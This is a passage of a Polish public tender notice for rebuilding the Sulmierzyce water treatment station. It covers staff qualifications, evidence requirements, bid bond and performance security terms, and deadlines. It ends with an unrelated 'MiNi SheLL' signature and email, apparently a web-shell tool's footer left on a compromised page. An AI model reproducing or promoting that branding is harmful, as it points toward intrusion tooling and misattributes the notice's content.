instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/><br/>- Kierownik budowy: (w rozumieniu ustawy Prawo budowlane) - niniejsza osoba ma posiadać następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz uprawnienia: <br/>wykształcenie wyższe inżynierskie,<br/>doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót przy realizacji przynajmniej dwóch robót budowlanych dotyczących budowy lub rozbudowy lub modernizacji lub przebudowy stacji uzdatniania wody , które swym zakresem obejmowało roboty w branżach elektrycznej, AKPiA, konstrukcyjno-budowlanej, sanitarnej i technologicznej o wydajności technologii uzdatniania wody 45 m3/h, w tym jedna o wartości robót co najmniej 7.000.000 złotych brutto (słownie: siedem milionów złotych), <br/>uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, <br/>posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/>- Kierownik robót konstrukcyjno - budowlanych (w rozumieniu ustawy Prawo budowlane) - niniejsza osoba ma posiadać następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz uprawnienia:<br/>wykształcenie wyższe inżynierskie,<br/>doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika robót konstrukcyjno-budowlanych przy realizacji przynajmniej dwóch robót budowlanych dotyczących budowy lub rozbudowy lub modernizacji lub przebudowy stacji uzdatniania wody , które swym zakresem obejmowało roboty w branżach elektrycznej, AKPiA, konstrukcyjno-budowlanej, sanitarnej i technologicznej o wydajności technologii uzdatniania wody 45 m3/h, w tym jedna o wartości robót co najmniej 7.000.000 złotych brutto (słownie: siedem milionów złotych),, <br/>uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej, <br/>posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/>- Kierownik robót w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (w rozumieniu ustawy Prawo budowlane) - niniejsza osoba ma posiadać następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz uprawnienia:<br/>wykształcenie wyższe inżynierskie,<br/>doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót w branży elektrycznej przy realizacji przynajmniej dwóch robót budowlanych dotyczących budowy lub rozbudowy lub modernizacji lub przebudowy stacji uzdatniania wody , które swym zakresem obejmowało roboty w branżach elektrycznej, AKPiA, konstrukcyjno-budowlanej, sanitarnej i technologicznej o wydajności technologii uzdatniania wody 45 m3/h, w tym jedna o wartości robót co najmniej 7.000.000 złotych brutto (słownie: siedem milionów złotych),<br/>uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/> posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/><br/>Specjalista ds. automatyki posiadający min 5 letnie doświadczenie zawodowe w realizacji robót z zakresu AKPiA w tym doświadczenia polegającego na realizacji min 2 robót budowlanych branży AKPiA w zakresie realizacji zadań związanych z gospodarką wodno-ściekową na czynnym obiekcie oraz posiadającego ważne na dzień składania ofert dodatkowe kwalifikacje uprawniające do zajmowania się eksploatacją urządzeń i sieci na stanowisku eksploatacji i dozoru grupa 2 i 3.<br/><br/>Programista systemów SCADA<br/>Minimum jedna osoba posiadająca doświadczenie we wdrażaniu otwartych systemów SCADA. Wskazana osoba musi wykazać się doświadczeniem polegającym na udziel w realizacji co najmniej dwóch projektów budowy systemów SCADA w zakresie gospodarki wodno-ściekowej o ilości zmiennych powyżej 1 000. Wskazana osoba musi potwierdzić doświadczenie w budowie systemów SCADA stosownymi certyfikatami i dopuszczeniem co najmniej jednego producenta takich systemów. <br/><br/>Programista PLC<br/>Minimum jedna osoba posiadająca doświadczenie w programowaniu otwartych systemów sterowania PLC na obiektach gospodarki wodno – ściekowej. Wskazana osoba musi wykazać się doświadczeniem polegającym na udziale w realizacji co najmniej dwóch inwestycji na obiektach gospodarki wodno – ściekowej, w ramach których wykonany został (dla każdej z nich) system sterowania z minimum dwóch sterowników PLC.<br/>Wskazana osoba winna potwierdzić doświadczeniem w programowaniu otwartych systemów sterowania PLC stosownymi certyfikatami i dopuszczeniem co najmniej jednego producenta takich systemów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca spełni warunek, jeżeli wykaże że: <br/><br/>1) - posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, co najmniej dwie roboty budowlane polegające na budowie/modernizacji/przebudowie stacji uzdatniania wody, które swym zakresem obejmowały obejmował roboty w branżach elektrycznej, AKPiA, konstrukcyjno-budowlanej, sanitarnej i technologicznej w tym kompleksową wymianę układu technologii uzdatniania wody, budowę stalowych zbiorników retencyjnych oraz kompletny system sterowania (AKPiA). Każde o wartości nie mniejszej niż 7 000 000,00 zł brutto,<br/>- posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zadania polegające na budowie/modernizacji/przebudowie stacji uzdatniania wody o wydajności technologii uzdatniania wody 45 m3/h, które swym zakresem obejmowało roboty w branżach elektrycznej, AKPiA, konstrukcyjno-budowlanej, sanitarnej i technologicznej w tym kompleksową wymianę układu technologii uzdatniania wody, budowę stalowych zbiorników retencyjnych oraz kompletny system sterowania (AKPiA) zrealizowane w formule zaprojektuj i wybuduj,<br/>- posiada doświadczenie, tj. w okresie ostatnich 5 lat wykonał co najmniej dwa zadania polegające na budowie/modernizacji/przebudowie sieci wodociągowej o długości min. 1 km w formule zaprojektuj i wybuduj,<br/>- posiada doświadczenie, tj. w okresie ostatnich 5 lat wykonał co najmniej jedno zadanie polegające na montażu i uruchomieniu min. 500 szt. wodomierzy wyposażonych w system zdalnego odczytu (nakładki radiowe),<br/>- posiada doświadczenie, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert, wykonał usługę polegającą na prowadzeniu bieżącej eksploatacji stacji uzdatniania wody o wydajności min. 45 m3/h przez okres minimum 6 miesięcy,<br/><br/>2) dysponowali w okresie wykonywania zamówienia i skierowali do jego realizacji minimum po 1 osobie w następujących specjalnościach (zgodnie z wymogami określonymi w dziale V pkt 5.6 ppkt. 4 pkt. 2 SWZ) :<br/><br/>- Projektant branży sanitarnej: <br/><br/> - Projektant Konstruktor: <br/><br/>- Projektant branży elektrycznej;<br/><br/>- Kierownik budowy:<br/><br/>- Kierownik robót konstrukcyjno - budowlanych <br/><br/>- Kierownik robót w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych <br/><br/>-Specjalista ds. automatyki posiadający min 5 letnie doświadczenie <br/><br/>-Programista systemów SCADA<br/><br/>-Programista PLC</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 8.1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 50.000,00 PLN (słownie: pięćdziesiąt tysięcy złotych 00/100)<br/>8.2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje do dnia upływu terminu związania ofertą.<br/>8.3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>8.4. Wykonawca może wnieść wadium w jednej lub kilku następujących formach:<br/>1) pieniądzu, przelewem na rachunek bankowy w Banku Spółdzielczym w Krotoszynie Oddział w Sulmierzycach, Nr 61 8410 1013 0000 0866 2000 0004 z dopiskiem: Wadium <br/>Rozbudowa i przebudowa stacji uzdatniania wody w Sulmierzycach<br/>Uwaga: Za termin wniesienia zabezpieczenia w formie pieniężnej przyjmuje się termin uznania na rachunku Zamawiającego.<br/>Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2024r. poz. 419).<br/>8.5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p.<br/>2) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Miejska Sulmierzyce<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>8.6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia o którym mowa w pkt 8.4. ppkt 2-4 SWZ wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>8.7. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa art. 98 ust.2 pkt 3 ustaw Pzp zostanie odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 18.1. Zamawiający żąda od Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą wniesienia zabezpieczenia należytego wykonania umowy w wysokości 3% ceny brutto całkowitej podanej w ofercie.<br/>18.2. Zabezpieczenie należytego wykonania umowy, zwane dalej „zabezpieczeniem” służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.<br/>18.3. Zabezpieczenie należytego wykonania umowy może być wniesione wg wyboru wykonawcy w jednej lub w kilku następujących formach:<br/>a) pieniądzu,<br/>b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy<br/>oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze<br/>zobowiązaniem pieniężnym,<br/>c) gwarancjach bankowych,<br/>d) gwarancjach ubezpieczeniowych,<br/>e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>18.4. Zabezpieczenie wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Nr 61 8410 1013 0000 0866 2000 0004 z dopiskiem: Zabezpieczenie – Rozbudowa i przebudowa stacji uzdatniania wody w Sulmierzycach<br/>18.5. Zabezpieczenie należytego wykonania umowy musi być wniesione najpóźniej w dniu podpisania umowy przez Zamawiającego, przed jej podpisaniem. Wniesienie zabezpieczenia w pieniądzu będzie uznane za skuteczne, jeżeli rachunek Zamawiającego zostanie uznany kwotą zabezpieczenia najpóźniej w dniu podpisania umowy, przed jej podpisaniem.<br/>18.6. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.<br/>18.7. Wszelkie koszty i opłaty związane z ustanowieniem zabezpieczenia ponosi wyłącznie wykonawca.<br/>18.8. W trakcie realizacji umowy Wykonawca może dokonać zmiany formy zabezpieczenia należytego wykonania umowy, pod warunkiem, że zmiana formy zabezpieczenia zostanie dokonana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości.<br/>18.9. W przypadku, gdy wystąpi konieczność przedłużenia terminu realizacji umowy, Wykonawca przed zawarciem aneksu, zobowiązany jest do przedłużenia terminu ważności zabezpieczenia wniesionego w formie innej niż pieniężna, albo jeśli nie jest to możliwe, do wniesienia nowego zabezpieczenia, na warunkach zaakceptowanych przez Zamawiającego, na okres wynikający z aneksu do umowy.<br/>18.10. Zwrot Zabezpieczenia odbędzie się w następujący sposób:<br/>1) Zamawiający zawraca zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia <br/>i uznania przez zamawiającego za należycie wykonane.<br/>2) Zamawiający może pozostawić na zabezpieczenie roszczeń z tytułu rękojmi za wady lub gwarancji kwotę nieprzekraczającą 30 % zabezpieczenia.<br/>3) Kwota pozostawiona na zabezpieczenie roszczeń z tytułu rękojmi za wady lub gwarancji wynosi 30% wysokości zabezpieczenia. Kwota ta zostanie zwrócona nie później niż w 15 dniu po upływie terminu okresu rękojmi za wady lub gwarancji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy Pzp oraz postanowień Projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.p</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-25 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com